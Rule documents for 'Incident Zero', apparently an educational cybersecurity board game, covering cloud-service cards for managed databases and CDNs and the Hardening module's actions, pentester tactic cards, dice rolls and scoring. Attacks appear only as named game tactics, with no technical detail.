Type: Cloud-Managed Data Layer Cost: 5 Budget (pay per GB + IO operations) Complexity: 1/4 (cloud provider manages infrastructure) Supported Platforms: AWS RDS, Azure SQL Database, Google Cloud SQL, MongoDB Atlas, DynamoDB Database Types: Relational (SQL Server, PostgreSQL, MySQL, Oracle), NoSQL (MongoDB, DynamoDB, Cassandra)
Description: Database managed entirely by cloud provider. You provision database capacity, cloud provider handles: backups, patching, failover, replication, encryption, monitoring.
Key Characteristics: - Managed: Cloud provider manages infrastructure (patches, backups, upgrades) - Automated Backup: Point-in-time recovery (no manual backup configuration) - Replication: Automatic geo-replication for disaster recovery - Encryption: Encryption at rest and in transit (built-in) - Scaling: Can scale storage and compute without downtime - Monitoring: Built-in monitoring and alerting - Compliance: Provider maintains compliance certifications (SOC 2, HIPAA, PCI-DSS)
Key Advantages: - Reliability: Provider manages availability (99.99% SLA typical) - Security: Provider manages patching and security updates - Compliance: Provider handles compliance certifications - Cost: No ops team needed to maintain database - Disaster Recovery: Automated backups and geo-replication - Scalability: Transparent scaling without downtime
Key Concerns (Security Perspective): - IAM Configuration: Database access via IAM roles (misconfiguration exposes data) - Network Exposure: Database may be internet-accessible (must restrict) - Encryption Keys: Cloud provider manages keys (limited control) - Audit Logging: Must enable audit logging (not always on by default) - Data Residency: Where is data stored geographically? - Backup Security: Backups must be encrypted and access-controlled - Supply Chain: Vendor is now part of attack surface - Multi-Tenant: Data may share hardware with other customers (trust model)
Defense Strategy: - Network Isolation: Database accessible only from application (not internet) - IAM Least Privilege: Only application has access (not human users) - Encryption Keys: Use customer-managed keys (not provider-managed) - Audit Logging: Enable all audit logging (schema changes, access, queries) - Monitoring: Set up alerting on suspicious queries (large exports, drops, etc.) - Backup Encryption: Verify backups are encrypted - Access Control: Disable public IP, use private endpoints only - Secrets Management: Database credentials in secrets vault (not hardcoded)
Network Interactions: - Works with: Cloud-first architecture (ARCH-05) or Cloud Hybrid (ARCH-04) - Integrates with: Application tier (via private endpoint) - Requires: Secrets management (for credentials) - Incompatible with: On-premises applications (latency/connectivity issues)
Incident Response Impact: - Database compromise likely primary attack goal (most valuable data) - Cloud provider manages baseline security (shifts responsibility model) - Audit logs are critical evidence (may be only forensics available) - Backup verification essential (can you restore to pre-attack state?) - Multi-tenant concerns for sensitive investigations
Team Design Validation: - ✓ If including managed database: must use private endpoints (not public) - ✓ Must enable audit logging - ✓ Must use customer-managed encryption keys - ✓ Must restrict database IAM permissions - ✗ Failure: Database public IP exposed to internet - ✗ Failure: Overly broad IAM permissions (anyone can access) - ✗ Failure: Audit logging disabled
Type: Edge Computing / Performance Enhancement Cost: 4 Budget (pay per GB transferred + requests) Complexity: 2/4 (configuration required, but well-documented) Supported Platforms: CloudFlare, AWS CloudFront, Azure CDN, Google Cloud CDN, Akamai Use Cases: Static assets (images, JS, CSS), web application acceleration, DDoS mitigation
Description: CDN caches content across globally distributed edge servers. When users request content, they get it from nearest edge server (fast). Reduces load on origin server and improves user experience.
Key Characteristics: - Distributed Caching: Content cached at 100+ edge locations worldwide - Fast Delivery: Users get content from nearest edge (milliseconds) - Origin Protection: Origin server behind CDN (hides IP, reduces load) - DDoS Protection: CDN absorbs DDoS attacks before reaching origin - SSL/TLS Termination: CDN handles encryption (origin can use HTTP) - Rate Limiting: Can rate-limit requests per IP - Security Headers: Can inject security headers (HSTS, CSP, etc.)
Key Advantages: - Performance: Content delivery 100x faster globally - DDoS Protection: Built-in DDoS mitigation - Security: Origin IP hidden, security scanning at edge - Cost Efficiency: Reduces origin server bandwidth costs - Geo-Location: Can route users to different content based on location
Key Concerns (Security Perspective): - Cache Poisoning: Attacker poisons CDN cache with malicious content - Origin Bypass: Attacker finds origin IP, bypasses CDN security - SSL Stripping: CDN can decrypt traffic (must trust CDN provider) - Cookie Security: Sensitive cookies may be cached (GDPR/privacy issue) - Personalization: Cached content loses personalization (may expose user data) - Configuration Mistakes: Wrong cache settings may cache sensitive content - Origin Protection: Still need to protect origin server (CDN is not complete solution) - Bot Attack: Attackers can still target origin through CDN
Defense Strategy: - Cache Settings: Do not cache sensitive content (set cache headers) - Origin Protection: Implement Web Application Firewall (WAF) on origin - Rate Limiting: Configure CDN rate limiting rules - DDoS Settings: Enable DDoS protection features - SSL Validation: Verify SSL certificates (prevent MITM) - Geoblocking: Block traffic from unwanted regions (geo-restrictions) - Security Headers: Implement security headers (HSTS, CSP, X-Frame-Options) - Origin IP Hiding: Use origin concealment (hide real IP) - Monitoring: Monitor for suspicious CDN patterns
Network Interactions: - Works with: Web application (static assets + dynamic content) - Works with: Cloud Hybrid (ARCH-04) or Cloud First (ARCH-05) - Complements: Web Application Firewall (WAF) - Optional with: Infrastructure (performance enhancement, not required)
Incident Response Impact: - CDN compromise could distribute malware to all users (supply chain attack) - Cache poisoning affects entire user base - Origin IP exposure could enable direct attacks on origin server - CDN logs are evidence (attacker activity visible in CDN analytics) - DDoS attack visibility (CDN shows attack patterns)
Team Design Validation: - ✓ If including CDN: must configure cache headers correctly - ✓ Must enable security features (DDoS, WAF, rate limiting) - ✓ Should hide origin IP - ✗ Failure: Caching sensitive/personalized content - ✗ Failure: Disabled security features - ✗ Failure: Origin IP exposed
| Card | Technology | Cost | Complexity | Primary Benefit |
|---|---|---|---|---|
| CLOUD-01 | Microservices | 6 | 3/4 | Scalability & Velocity |
| CLOUD-02 | Serverless | 3 | 2/4 | Simplicity & Cost |
| CLOUD-03 | Managed DB | 5 | 1/4 | Reliability & Compliance |
| CLOUD-04 | CDN | 4 | 2/4 | Performance & DDoS Protection |
Key Principle: Different Cloud Services, Different Security Models
Each cloud variant represents different architectural choices: - Microservices: Scalability + complexity (many attack surfaces) - Serverless: Simplicity + different threat model (function-level security) - Managed Database: Reliability + shared responsibility (provider + customer) - CDN: Performance + edge computing (distributed security)
Organizations use combinations of these services: - Serverless functions backed by managed database (simple, scalable, reliable) - Microservices deployed globally via CDN (scalable, fast, available) - Mix of serverless and containers (different workloads, different approaches)
Cloud variants add flexibility to network design: - Can build entirely on serverless (very simple, minimal infrastructure) - Can mix serverless + containers (different workloads) - Can add CDN for global distribution - Can use managed database for all data needs
Cloud variants have different cost models: - Serverless: Cheap if used occasionally, expensive if always running - Microservices: Scale-to-zero not available (always running cost) - Managed Database: Scale with usage (can get expensive) - CDN: Cheap for low traffic, expensive for high traffic
Cloud variants trade operational complexity for different concerns: - Serverless: No ops burden, but security mindset different - Microservices: Ops burden (Kubernetes), but powerful scalability - Managed Database: No ops burden, but IAM misconfiguration risk - CDN: Config once, then mostly set-and-forget
Additional Cloud Variant Cards: - CLOUD-05: Machine Learning Platform (ML training/inference) - CLOUD-06: Event Streaming (Kafka, pub/sub architectures) - CLOUD-07: Search & Analytics (Elasticsearch, BigQuery) - CLOUD-08: API Gateway (API management and rate limiting) - CLOUD-09: Message Queue (async processing, event-driven) - CLOUD-10: Infrastructure as Code Platform (automated deployment)
Network Building Module: Cloud Variants (Expansion) Part of Incident Zero, a modular cybersecurity board game v2.1 - Balanced & Refined Edition
docs/rules/module-hardening.md
Version: 2.2 - Playtest Edition Module Duration: 20-45 minutes (standalone or after Incident Response) Prerequisites: None (can play standalone) or completion of Incident Response module Learning Focus: Defense-in-depth, security architecture, proactive hardening, layered controls
The Hardening Module teaches players how to build multi-layered security controls that work together to protect critical systems. Players transition from reactive incident response to proactive security design.
This module can be: - Standalone: Play alone with generated threat context - Continuation: Follow a successful Incident Response (players harden against discovered threats) - Paired: Combined with other modules for complete security lifecycle training
| Aspect | Incident Response | Hardening |
|---|---|---|
| Focus | Detect hidden threats | Build defenses against known threats |
| Time Pressure | High (variable turn limit, 100 budget) | Lower (7 turns, carries budget forward) |
| Actions | Investigate, Deploy, Emergency Response | Deploy, Upgrade, Playbook, Test |
| Rolls Needed | Investigation & Defense deployments | Test & Drill and Pentester defense rolls |
| Scoring | Detection efficiency | Defense layering & breadth |
| Threats | Hidden chain | Known vectors, Pentester tactics |
Generate threat context from scratch (v2.2 — one standard procedure): - Roll 1d6 for each of the six threat vectors (SOCIAL_ENGINEERING, WEB_EXPLOIT, CREDENTIAL_ABUSE, MALWARE, NETWORK, DATA_EXFIL): - 1-2: No notable threat on this vector - 3-4: Intermediate threat on this vector - 5-6: Advanced threat on this vector - Or use Threat Orchestrator's chosen scenario - Budget: 150 (full planning allocation)
Use the attack chain that was just discovered: - All revealed threat cards now represent known attack vectors - Each vector gets a defense priority - Budget carries over (minimum 20, maximum 150) - Example: If IR revealed Phishing, Lateral Movement, and Data Exfil, you harden against those specific vectors
Threat Orchestrator describes a realistic scenario:
"Imagine your team successfully detected an attack chain: 1. Phishing campaign (SOCIAL ENGINEERING vector) 2. Lateral movement via SMB (NETWORK vector) 3. Data exfiltration (DATA EXFIL vector)
You have time to harden your network. Here are the threat vectors you need to defend against..."
cards/hardening/core-deck/defense-cards.md)cards/hardening/core-deck/pentester-tactic-cards.md)cards/network-building/core-deck/asset-cards.md)Each Blue Team receives 5 Defense Cards (drawn randomly, face down in hand)
Threat Orchestrator provides context for the hardening scenario:
"Your detection team successfully identified an attack chain. Now you have time and resources to harden your defenses to prevent similar attacks in the future. Here's what you're defending against and what assets are at risk..."
The Hardening module runs 7 turns at every difficulty level (v2.2 — difficulty scales through the number of Pentester Tactics, not the turn count). One action per turn.
START OF TURN - Announce turn number: "Hardening Turn 3..." - Announce remaining Budget - Declare any Pentester Challenge scheduled for this turn
PLANNING PHASE (2-3 minutes) - Team discusses hardening strategy - Decides which action to take this turn - Prepares for any mid-turn Pentester Challenge
ACTION PHASE - Execute chosen action (see below) - Resolve rolls if applicable - Update trackers
END OF TURN - Advance turn counter - Draw 1 new Defense Card - Check if Pentester Challenge occurs (typically turn 3-4)
Cost: 10/15/25 Budget (based on card tier) Roll Required: None—automatic success
How it works: 1. Choose a Defense Card from your hand 2. Announce which Asset or threat vector it protects 3. Place card on the table (face up) 4. Optional: Explain the deployment strategy (enhances learning but not required)
Effect: - Defense is immediately active and deployed - Counts toward Security Score (5 points per defense) - Cannot be undone (represents permanent security improvement) - Stays on board for remainder of module and beyond (if continuing)
Quick-Win Rule (v2.2): You may deploy up to 2 BASIC-tier defenses as a single action (pay 10 Budget each). This keeps foundational hygiene affordable within the 7-turn limit.
Examples: - Deploy Multi-Factor Authentication (ADVANCED - 15 Budget) on VPN access - Deploy EDR on all workstations (ADVANCED - 15 Budget) - Deploy Data Loss Prevention (DLP) on network gateways (ADVANCED - 15 Budget) - Deploy Email Authentication (BASIC - 10 Budget) and User Security Training (BASIC - 10 Budget) together as one action (v2.2 Quick-Win)
Strategic Notes: - BASIC defenses (10 Budget) are cheaper but carry smaller printed bonuses against Pentester Tactics - ADVANCED defenses (15 Budget) provide good balance of cost/effectiveness - ELITE defenses (25 Budget) are expensive but carry the largest printed bonuses against Pentester Tactics
Cost: 5 Budget per upgrade Roll Required: None
How it works: 1. Choose a Defense Card already deployed (earlier this game, or carried over from Incident Response) 2. Pay 5 Budget 3. Mark defense with +2 effectiveness bonus (track on paper) 4. Optional: Describe the hardening (e.g., "Tuning behavioral analytics in EDR")
Effect: - Defense effectiveness increases by +2 - Bonuses stack (EDR with three upgrades = +6 total) - Counts toward Security Score (2 points per upgrade) - Makes defense more resistant to Pentester Tactics
Examples of Hardening: - "Harden our MFA by requiring hardware tokens instead of SMS" → MFA now has +2 - "Enhance Network Segmentation with microsegmentation inside critical zones" → NS now has +2 - "Improve SIEM with threat intelligence integration" → SIEM now has +2
Strategic Value: - Fewer, well-hardened defenses can beat many basic ones - Upgrades compound: 3 upgrades on one defense = +6 bonus - Cost-effective way to improve security posture without full new deployments
Cost: 10 Budget per playbook Roll Required: None Limit (v2.2): Maximum 2 playbooks per game
How it works: 1. Choose a specific threat vector you want to prepare for (SOCIAL ENGINEERING, WEB EXPLOIT, CREDENTIAL ABUSE, MALWARE, NETWORK, or DATA EXFIL) 2. Write a 1-2 sentence playbook describing your response plan 3. Place playbook on the table with vector marked 4. When an attack using this vector occurs, you get one-time +3 bonus to your defense roll
Effect: - Provides one-time +3 bonus to defense roll when matching vector is attacked - Playbook is discarded after use (one-time only) - Counts toward Security Score (10 points per playbook) - Forces strategic thinking about which threats matter most
Example Playbooks: - SOCIAL ENGINEERING: "Credential Compromise Response - Forced MFA re-authentication and access token revocation across all systems" - MALWARE: "Ransomware Response - Immediate backup isolation, network segmentation, and process termination" - NETWORK: "Lateral Movement Detection - Real-time network behavior analysis and suspicious SMB activity alert protocol" - DATA EXFIL: "Data Theft Response - DLP block, endpoint containment, and forensic image capture" - WEB EXPLOIT: "Web Attack Response - Immediate application firewall rule deployment and vulnerable component isolation"
Strategic Considerations: - Playbooking is expensive (10 Budget) but provides large bonus (+3) - You can only use each playbook once, and only create two per game (v2.2) — plan carefully - Encourages predicting which threats are most dangerous - Reflects real-world incident response playbook development - Playbooks alone cannot win the game: victory requires at least 4 deployed defenses (v2.2)
Cost: 0 Budget (represents time investment) Roll Required: 11+ on d20
How it works: 1. Announce you're conducting a security drill 2. Choose one or more deployed defenses to test 3. For each defense, roll 1d20 4. Defenses with roll 11+ are successful; 10 or less fail
Effect: - Successful tests: Defense works properly (tracked as "tested") - Failed tests: Implementation issues found (no penalty, but noted) - Tests don't contribute to final score but provide confidence - Teaches the importance of validation and testing
Educational Value: - Reflects real-world practice of security testing - Validates that deployments actually work - Low-cost way to use budget on preparation vs. initial deployment
Typically after turn 3 or 4, once teams have deployed initial defenses.
Timing Options: - Per turn: One Pentester Tactic drawn each turn (turns 3-6) - Multiple attacks: 2-4 Pentester Tactics total (depends on difficulty) - Final challenge: All remaining Tactics drawn at end of turn 6
(v2.2) The Hardening module uses the standard Pentester Tactic deck, PT-01 to PT-08, defined in cards/hardening/core-deck/pentester-tactic-cards.md. Each card is a realistic red-team technique with a printed DC (difficulty class) and a list of printed defense bonuses for specific Defense Cards.
| Card | Tactic | Target Vectors | Difficulty | Primary Defense |
|---|---|---|---|---|
| PT-01 | Social Engineering - Pretexting Attack | SOCIAL_ENGINEERING, CREDENTIAL_ABUSE | BASIC (DC 12) | D-02 User Training |
| PT-02 | Malware Evasion - Living-off-the-Land | MALWARE, CREDENTIAL_ABUSE | INTERMEDIATE (DC 13) | D-08 EDR |
| PT-03 | Credential Dumping - Mimikatz | CREDENTIAL_ABUSE, MALWARE | INTERMEDIATE (DC 13) | D-16 Credential Guard |
| PT-04 | Lateral Movement - Network Traversal | NETWORK, CREDENTIAL_ABUSE | INTERMEDIATE (DC 13) | D-09 Network Segmentation |
| PT-05 | Privilege Escalation - Unpatched Kernel Exploit | MALWARE, WEB_EXPLOIT | ADVANCED (DC 14) | D-03 Patch Management |
| PT-06 | Data Exfiltration - Unmonitored Channel | DATA_EXFIL, NETWORK | ADVANCED (DC 14) | D-11 DLP |
| PT-07 | Supply Chain Compromise - Trusted Update | MALWARE, WEB_EXPLOIT | ADVANCED (DC 14) | D-08 EDR / D-13 Threat Hunting |
| PT-08 | Insider Threat - Malicious Administrator | CREDENTIAL_ABUSE, DATA_EXFIL, NETWORK | EXPERT (DC 15) | D-22 SIEM / D-20 Zero Trust |
For expansion play, 8 additional tactics (PT-09 to PT-16) are available in cards/hardening/expansion-deck/advanced-tactics.md.
When a Pentester Tactic Card is drawn:
1. Threat Orchestrator Describes the Attack
Example (PT-01): "A pentester calls your IT helpdesk impersonating a VIP executive, demanding emergency access to critical systems..."
2. Blue Team Chooses ONE Deployed Defense to Resolve With
Example: "We resolve this with our User Security Training (D-02) — staff are trained to verify callers."
3. Roll the Defense Roll
Defense roll = d20 + printed defense bonus for the chosen defense (from the tactic card's bonus list) + hardening upgrades on that defense (+2 each) + relevant playbook (+3, one-time, matching vector)
Success if the total ≥ the tactic card's printed DC.
Notes: - Only ONE defense's printed bonus applies per roll. If your chosen defense isn't on the tactic's bonus list, its printed bonus is +0 (upgrades and playbooks still apply). - Multi-vector or multi-phase tactics (e.g., PT-09): resolve each vector/phase as a separate roll, one chosen defense per roll. - Playbooks are discarded after use.
4. Worked Example
Tactic: PT-01 Social Engineering - Pretexting (DC 12)
Chosen defense: D-02 User Security Training (printed bonus +2 vs PT-01)
D-02 has 1 hardening upgrade (+2)
SOCIAL ENGINEERING playbook available (+3)
Roll 1d20 = 7
Total = 7 + 2 (printed) + 2 (upgrade) + 3 (playbook) = 14
14 ≥ DC 12 → SUCCESS. Playbook is discarded.
5. Outcome
(v2.2: the old -10 Reputation penalty has been removed from Hardening — failed defenses simply score nothing and trigger the card's printed consequence. Reputation remains a Disaster Recovery mechanic.)
Security Score = (Defenses Deployed × 5)
+ (Hardening Upgrades × 2)
+ (Playbooks Created × 10) [max 2 playbooks]
+ (Pentester Tactics Defended × 5)
+ (Budget Remaining / Starting Budget) × 10
Turn 1: Deploy D-01 Email Auth + D-02 User Training (2 BASIC as one action) -20
Turn 2: Deploy D-04 Firewall Rules + D-19 Backup & DR (2 BASIC) -20
Turn 3: Deploy D-08 EDR (ADVANCED) -15
→ PT-02 strikes: defended ✓
Turn 4: Deploy D-09 Network Segmentation (ADVANCED) -15
Turn 5: Create MALWARE playbook -10
→ PT-01 strikes: defended ✓
Turn 6: Harden D-08 EDR (+2) -5
Turn 7: Deploy D-11 DLP (ADVANCED) -15
→ PT-06 strikes: defended ✓ (D-11's printed +4 bonus vs DC 14 carried the roll)
Budget spent: 100 → 50 remaining
Defenses Deployed: 7 × 5 = 35 points
Hardening Upgrades: 1 × 2 = 2 points
Playbooks Created: 1 × 10 = 10 points
Tactics Defended: 3 × 5 = 15 points
Budget Efficiency: (50/150) × 10 ≈ 3 points
─────────────────────────────────────
FINAL SECURITY SCORE: 65 points → Strong (Victory)
| Score | Level | Interpretation | Real-World Equivalent |
|---|---|---|---|
| 75+ | Exceptional | Enterprise-grade security posture | Large financial institution |
| 60-74 | Strong | Comprehensive defense-in-depth | Mid-market company |
| 45-59 | Adequate | Basic layered protection | Startup/small business |
| 30-44 | Weak | Minimal defenses, significant gaps | Under-resourced organization |
| Below 30 | Vulnerable | Inadequate protection, likely to fail | High-risk organization |
Blue Team Wins Hardening if ALL of: - Final Security Score ≥ 60 (strong, comprehensive defense-in-depth) - AND at least 4 defenses deployed (playbooks and upgrades alone cannot win) - AND majority of Pentester Tactics defended against (defenses actually work)
Interpretation: Team successfully built layered, effective defenses within constraints.
Blue Team Loses Hardening if: - Final Security Score < 45 (inadequate overall protection) - OR Budget exhausted before completing hardening strategy - OR majority of Pentester Tactics succeeded (defenses aren't effective)
Interpretation: Defenses are insufficient against realistic threats.
Scores between 45 and 59 that meet the tactic/defense requirements count as a partial success — adequate protection with room to improve.
All difficulty levels run 7 turns (v2.2); difficulty scales via Pentester Tactic count.
Too Easy: - Teams deploy 8+ defenses with large budget remaining - Almost all Pentester Tactics fail - No meaningful decisions required - Game feels trivial
Too Hard: - Teams can only afford 3-4 defenses with budget exhausted - Almost all Pentester Tactics succeed - Team feels overwhelmed - Frustration rather than learning
Just Right (within 7 actions and 150 Budget): - Teams deploy 5-7 defenses with some budget remaining (the Quick-Win rule for BASIC pairs makes this achievable) - 50-70% of Pentester Tactics fail (defenses work) - Teams debate priorities and trade-offs - Players learn through strategic choices
Adjustments: - Lower budget (100) for harder game - Higher budget (200) for easier game - Fewer/more Pentester Tactics - Provide feedback: "Your defenses are working well" or "Your SIEM isn't catching these"
Timing: Draw first tactic after turn 3-4 (let teams deploy initial defenses)
Narrative: Always frame tactics as specific scenarios: - "Your red team just attempted a supply chain attack..." - "An advanced attacker is using living-off-the-land techniques..." - "A coordinated insider attack is beginning..."
Strategy: Escalate difficulty - Turns 1-2: No tactics (deployment phase) - Turn 3: First tactic (softer: PT-01, DC 12) - Turn 4: Second tactic (medium: PT-02 to PT-04, DC 13) - Turn 5+: Third/fourth tactics (harder: PT-05 to PT-08, DC 14-15)
Defense-in-Depth: When a chosen defense earns only a +0/+1 printed bonus, discuss why layers matter Cost-Benefit: Teams overspend on Elite defenses; discuss Advanced alternatives Upgrades: Teams ignore upgrades; show how +2 bonuses compound Playbooks: Teams underestimate playbooks; demonstrate their power (+3 bonus) — and note the 2-per-game cap
| Learning Goal | How Module Teaches It |
|---|---|
| Defense-in-depth concept | Deploy multiple layers, see some fail while others succeed |
| Resource prioritization | Limited budget forces choices between defenses |
| Trade-offs in security | BASIC cheap but weak vs. ELITE expensive but strong |
| Proactive vs. reactive | Hardening teaches prevention vs. IR's response focus |
| Layering effectiveness | Pentester Tactics show how weak defenses alone fail |
| Incident playbooks | Playbook mechanic teaches the value of preparation |
| Security architecture | Thoughtful defense selection teaches how to think architecturally |
| Cost-benefit analysis | Every budget point spent has consequences |
| Action | Cost | Roll | Effect | Score |
|---|---|---|---|---|
| Deploy Defense | 10/15/25 | None | Active immediately (up to 2 BASIC per action, v2.2) | +5 each |
| Harden Upgrade | 5 | None | +2 effectiveness | +2 |
| Create Playbook | 10 | None | One-time +3 bonus (max 2 per game, v2.2) | +10 |
| Test & Drill | 0 | 11+ | Validates defense | +0 |
Pentester defense roll (v2.2): d20 + printed bonus (one chosen defense) + upgrades (+2 each) + playbook (+3) ≥ tactic DC. Each tactic defended: +5 Score.
After Winning Hardening: - Continue to Incident Response (test your defenses) - Continue to Audit & Compliance (verify your hardening) - Play again with new threat vectors
After Losing Hardening: - Replay with different strategy - Try higher budget variation - Study which Pentester Tactics caused most losses - Plan for those tactics in next iteration
Changes for playtesters to validate, and why they were made:
cards/hardening/core-deck/pentester-tactic-cards.md. This removes duplicate, conflicting tactic definitions (including a "Persistence Expert" tactic that referenced a nonexistent PERSISTENCE vector).Designer note — why playbook spam can't win (v2.2 math): - Playbook-spam strategy: 2 playbooks (cap) = 20 pts; 0 defenses = 0 pts; with no deployed defenses every Pentester roll is d20 + 0 (+3 once per playbook) vs DC 12-15, so expect ~1 of 3 tactics defended = 5 pts; budget efficiency (130/150) × 10 ≈ 9 pts. Total ≈ 34 — below the 60 threshold, and it fails the ≥4-defenses gate regardless. Cannot win. - Balanced layered strategy: 7 defenses (35) + 1 upgrade (2) + 1 playbook (10) + 3 of 3 tactics defended (15) + budget efficiency (50/150 × 10 ≈ 3) = 65 → Victory. See the worked example above.
Hardening Module - Complete Rules Part of Incident Zero, a modular cybersecurity board game v2.2 - Playtest Edition
docs/standalone-games/hardening.md
Version: 2.2 - Playtest Edition Duration: 30-45 minutes Players: 1 Threat Orchestrator + 2-4 Blue Team members Best For: Defense architecture training, security design, proactive hardening practice
The Hardening Module teaches players how to build defense-in-depth—layered security controls that work together to protect critical systems. Players deploy defenses strategically, harden existing controls, and defend against pentester challenges.
This module focuses on proactive security rather than reactive incident response.
All difficulty levels run 7 turns, one action per turn (v2.2). Difficulty scales via Pentester Tactic count.
| Difficulty | Budget | Turn Limit | Pentester Tactics | Best For |
|---|---|---|---|---|
| Beginner | 150 | 7 turns | 2 cards | First-time, teaching defense concepts |
| Intermediate | 150 | 7 turns | 3 cards | Standard play, balanced challenge |
| Advanced | 150 | 7 turns | 4 cards | Experienced players, comprehensive test |
Option A: Hypothetical Threat (Solo) Threat Orchestrator describes a realistic threat scenario:
"Imagine your team successfully detected an attack last month. The attacker started with a phishing email, moved laterally through the network via SMB, and escalated privileges using a kernel exploit. Now you have time to harden your defenses. Here's the threat profile you need to defend against..."
Option B: Follow from Incident Response Module If continuing from Incident Response: - Use the attack chain that was just played - Players now design defenses against those specific threats - Discovered vectors guide defense selection
Option C: Generate Threat Vectors Randomly (v2.2 — one standard procedure) Roll 1d6 for each of the six threat vectors to determine which threats you must defend against (1-2 = no notable threat, 3-4 = intermediate threat, 5-6 = advanced threat): - Roll 1d6 for SOCIAL ENGINEERING threats - Roll 1d6 for WEB EXPLOIT threats - Roll 1d6 for CREDENTIAL ABUSE threats - Roll 1d6 for MALWARE threats - Roll 1d6 for NETWORK threats - Roll 1d6 for DATA EXFIL threats
cards/network-building/core-deck/asset-cards.md)Each turn represents time allocated to hardening (15-30 minutes of planning work per turn).
TURN SEQUENCE:
1. START OF TURN - Read turn number aloud ("Hardening Turn 1...") - Remaining budget announced
2. BLUE TEAM'S TURN (2-3 minutes discussion) - Discuss which hardening action to take - Decide strategy (deploy new defense, upgrade existing, create playbook)
3. ACTION EXECUTION - Perform chosen action - No roll needed for deployment (see below for when rolls occur) - Update trackers
4. END OF TURN - Advance Turn Tracker by 1 - Draw 1 new Defense Card - Check if mid-game Pentester Challenge should occur
Cost: 10/15/25 Budget (by tier) Roll Required: None—automatic success
How it works: 1. Choose a Defense Card from your hand 2. Announce which Asset or threat vector it defends 3. Explain strategy (optional but encouraged): "Why are we deploying this defense?" 4. Card is placed on the table (face up)
Outcome: - Defense is immediately active - No roll needed - All deployed defenses contribute to final Security Score
Quick-Win Rule (v2.2): You may deploy up to 2 BASIC-tier defenses as a single action (pay 10 Budget each).
Note (v2.2): The core deck contains one copy of each defense (D-01 to D-24), so each defense can only be deployed once per game. If you want duplicate deployments (e.g., two MFA implementations on different systems), print a second copy of the deck and house-rule it.
Cost: 5 Budget per upgrade Roll Required: None
How it works: 1. Choose a Defense Card already deployed (from this turn or previous) 2. Pay 5 Budget 3. Mark defense with +2 effectiveness bonus (track on paper next to the card) 4. Optionally explain: "We're improving this defense by..."
Examples of hardening: - "Hardening our EDR deployment by tuning behavioral analytics and adding threat intel integration" → EDR now has +2 bonus - "Hardening our MFA implementation by enabling hardware token requirements" → MFA now has +2 bonus - "Hardening Network Segmentation by adding microsegmentation within critical zones" → Network Seg now has +2 bonus
Strategic Value: - Each upgrade adds +2 to the defense's effectiveness - Upgrades can stack (e.g., MFA with +2, +2, +2 = +6 total) - Upgraded defenses are more likely to survive Pentester Tactics
Cost: 10 Budget per playbook Roll Required: None Limit (v2.2): Maximum 2 playbooks per game
How it works: 1. Choose a specific threat vector you want to prepare for 2. Write a 1-2 sentence playbook describing your response: (e.g., "Ransomware Outbreak Response: Immediate backup isolation, network segmentation, and access revocation") 3. Place playbook card on the table 4. When a Pentester uses a matching vector later, you get +3 bonus to your defense roll
Example Playbooks: - "Credential Compromise Incident: Forced MFA re-authentication and access token revocation" - "Supply Chain Attack Detection: Monitor unusual DNS and C2 beaconing patterns" - "Insider Threat Response: Behavioral analytics review and privileged access audit" - "Ransomware Response: Immediate backup isolation and network segmentation"
Strategic Value: - Playbooks cost more (10 Budget) but provide larger bonus (+3) - Limited use (one-time per playbook, then discarded after use; max 2 per game) - Forces teams to predict which threats are most dangerous - Playbooks alone cannot win: victory requires at least 4 deployed defenses (v2.2)
Cost: 0 Budget (represents time, not money) Roll Required: 11+ on d20
How it works: 1. Announce you're conducting a drill/test of deployed defenses 2. Choose one or more deployed defenses to test 3. Roll 1d20 for each defense 4. Each defense with roll of 11+ succeeds; 10 or less fails
Outcome: - Success: Defense works properly; mark it as "tested" (contributes extra points at end) - Failure: Defense has implementation issues; no penalty, but doesn't count toward testing bonus
Strategic Value: - Free way to validate defenses - Successful tests add confidence (and points) but don't guarantee success against real attacks - Encourages thinking about deployment validation (realistic practice)
After turn 3 or 4, the Threat Orchestrator draws a Pentester Tactic Card (PT-01 to PT-08, see cards/hardening/core-deck/pentester-tactic-cards.md) and launches a simulated attack.
1. TO Describes the Attack Scenario Example (PT-02): "Your red team delivered a payload that uses only built-in Windows tools — living-off-the-land. Can your defenses detect it?"
2. Blue Team Chooses ONE Deployed Defense to Resolve With Team selects one deployed defense to defend against this attack
3. Roll the Defense Roll
Defense roll = d20 + printed defense bonus for the chosen defense (from the tactic card's bonus list) + hardening upgrades on that defense (+2 each) + relevant playbook (+3, one-time, matching vector)
Success if the total ≥ the tactic card's printed DC (DC 12-15 for PT-01 to PT-08).
If the chosen defense isn't on the tactic's bonus list, its printed bonus is +0 (upgrades and playbooks still apply). Multi-vector tactics: two separate rolls, one defense each.
4. Outcome - Success: Defense holds; count as a Pentester Tactic Defended (+5 Security Score) - Failure: Attack succeeds; apply the consequence printed on the tactic card; no score for this tactic
Optional: Play multiple pentester tactics (2-4 total) across turns 3-6.
Defenses Deployed: Count × 5 points
Hardening Upgrades: Count × 2 points
Playbooks Created: Count × 10 points [max 2 playbooks per game]
Pentester Tactics Defended: Count × 5 points
Budget Efficiency: (Remaining Budget / Starting Budget) × 10 points
EXAMPLE (150 starting budget, 7 turns):
- 7 defenses deployed (two turns used the 2-BASIC Quick-Win): 35 points
- 1 hardening upgrade: 2 points
- 1 playbook created: 10 points
- 3 of 3 pentester tactics defended: 15 points
- 50 budget remaining (spent 100): (50/150) × 10 ≈ 3 points
────────────────────────────
TOTAL SECURITY SCORE: 65 points → Strong (Victory)
| Score | Level | Interpretation |
|---|---|---|
| 75+ | Exceptional | Enterprise-grade security posture; sophisticated threat preparedness |
| 60-74 | Strong | Mid-market ready; layered, comprehensive defenses |
| 45-59 | Adequate | Startup-level protection; covers main attack vectors |
| 30-44 | Weak | Minimal protection; significant gaps remain |
| Below 30 | Vulnerable | Inadequate defenses; likely to fail against sophisticated attacks |
Blue Team Wins Hardening if ALL of: - Final Security Score ≥ 60 (strong layered defenses) - AND at least 4 defenses deployed (playbooks and upgrades alone cannot win) - AND majority of Pentester Tactics were successfully defended against
Blue Team Loses Hardening if: - Final Security Score < 45 (inadequate protection) - OR Budget exhausted before defenses were deployed - OR majority of Pentester Tactics succeeded despite defenses
Scores of 45-59 that meet the tactic/defense requirements count as a partial success.
PART 1: DEFENSE STRATEGY (3 min) 1. "How did you prioritize which defenses to deploy first?" 2. "What layers of defense work best together?" 3. "Did the Pentester Tactics reveal gaps? Which ones?"
PART 2: RESOURCE MANAGEMENT (2 min) 1. "Did you run out of budget? Would more budget have helped?" 2. "Which defenses provided the best value (cost vs. effectiveness)?" 3. "Would you have allocated budget differently?"
